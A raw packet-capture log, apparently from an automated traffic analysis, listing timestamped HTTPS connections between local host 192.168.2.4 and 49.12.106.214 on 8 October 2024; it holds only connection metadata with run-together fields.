                                                                                                                Oct 8, 2024 04:59:53.663091898 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.663150072 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.663161039 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.663203955 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.670618057 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.670651913 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.671430111 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.671494007 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.671590090 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.682070017 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.682097912 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.335890055 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.335989952 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.336344957 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.336373091 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.337810040 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.337822914 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.765889883 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.765952110 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.765993118 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.766042948 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.766042948 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.766113997 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.766153097 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.766181946 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.796438932 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.796480894 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.796658039 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.796684980 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.796746969 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.864065886 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.864121914 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.864156008 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.864171028 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.864202976 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.864236116 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.895438910 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.895503998 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.895533085 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.895549059 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.895596981 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.895615101 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.934310913 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.934359074 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.934525967 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.934539080 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.934597969 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.959348917 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.959405899 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.959460974 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.959472895 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.959516048 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.959538937 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.979173899 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.979216099 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.979274988 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.979285955 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:54.979330063 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:54.979356050 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.001859903 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.001898050 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.001975060 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.001986980 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.002028942 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.002068996 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.012737989 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.012775898 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.012837887 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.012850046 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.012900114 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.012922049 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.029932976 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.029970884 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.030040979 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.030051947 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.030095100 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.030111074 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.044375896 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.044414997 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.044483900 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.044495106 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.044539928 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.044555902 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.060298920 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.060336113 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.060394049 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.060405016 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.060446978 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.060491085 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.072725058 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.072763920 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.072931051 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.072942019 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.072999001 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.081958055 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.081995964 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.082057953 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.082068920 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.082099915 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.082132101 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.092123032 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.092160940 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.092221022 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.092231989 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.092276096 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.092295885 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.100415945 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.100455999 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.100522041 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.100538015 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.100572109 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.100605011 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.110517025 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.110554934 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.110624075 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.110635042 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.110676050 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.110692978 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.118469954 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.118511915 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.118560076 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.118571997 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.118601084 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.118622065 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.128238916 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.128278971 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.128323078 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.128333092 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.128360033 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.128387928 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.142329931 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.142369032 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.142436028 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.142446995 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.142487049 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.142508984 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.154133081 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.154186964 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.154266119 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.154282093 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.154318094 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.154335022 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.165348053 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.165388107 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.165559053 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.165571928 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.165628910 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.174129009 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.174165964 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.174221039 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.174231052 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.174257040 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.174276114 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.183938980 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.183979034 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.184029102 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.184040070 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.184067011 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.184091091 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.193938971 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.193977118 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.194148064 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.194159031 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.194219112 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.201422930 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.201461077 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.201508999 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.201519966 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.201545000 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.201572895 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.210283041 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.210319996 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.210374117 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.210385084 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.210417032 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.210443974 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.229543924 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.229583979 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.229635954 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.229648113 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.229675055 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.229696035 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.240561008 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.240603924 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.240654945 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.240670919 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.240698099 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.240726948 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.252051115 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.252089024 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.252134085 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.252145052 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.252175093 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.252196074 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.260859013 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.260898113 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.260960102 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.260971069 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.261008024 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.261028051 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.271286011 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.271326065 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.271502972 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.271516085 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.271574020 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.281061888 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.281101942 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.281155109 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.281166077 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.281199932 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.281222105 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.288240910 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.288279057 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.288321018 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.288331032 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.288368940 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.288388014 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.296260118 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.296319962 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.296341896 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.296360016 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.296391964 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.296418905 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.316150904 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.316220045 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.316247940 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.316258907 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.316299915 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.316329002 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.327336073 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.327378035 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.327420950 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.327431917 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.327481985 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.327502966 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333148956 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.333221912 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333233118 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.333285093 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333302975 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.333359957 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333767891 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333802938 CEST4434975449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.333825111 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.333863020 CEST49754443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.335817099 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.335907936 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.336011887 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.336534023 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.336580038 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.975985050 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.978718996 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.978974104 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.978981972 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:55.980271101 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:55.980276108 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422346115 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422370911 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422389030 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422499895 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.422533035 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.422554016 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.422590017 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.452879906 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.452908039 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.453002930 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.453064919 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.453224897 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.520584106 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.520611048 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.520816088 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.520910978 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.521076918 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.550379038 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.550399065 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.550508022 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.550569057 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.552098989 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.591689110 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.591706991 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.591933012 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.591998100 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.592076063 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.613574982 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.613593102 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.613795996 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.613859892 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.614134073 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.633440018 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.633469105 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.633634090 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.633634090 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.633699894 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.633761883 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.655725002 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.655745029 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.655854940 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.655917883 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.656083107 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.665709972 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.665733099 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.665878057 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.665946007 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.666006088 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.666007042 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.683284044 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.683300972 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.683442116 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.683522940 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.683681011 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.697551012 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.697568893 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.697674990 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.697755098 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.697834969 CEST49756443192.168.2.449.12.106.214
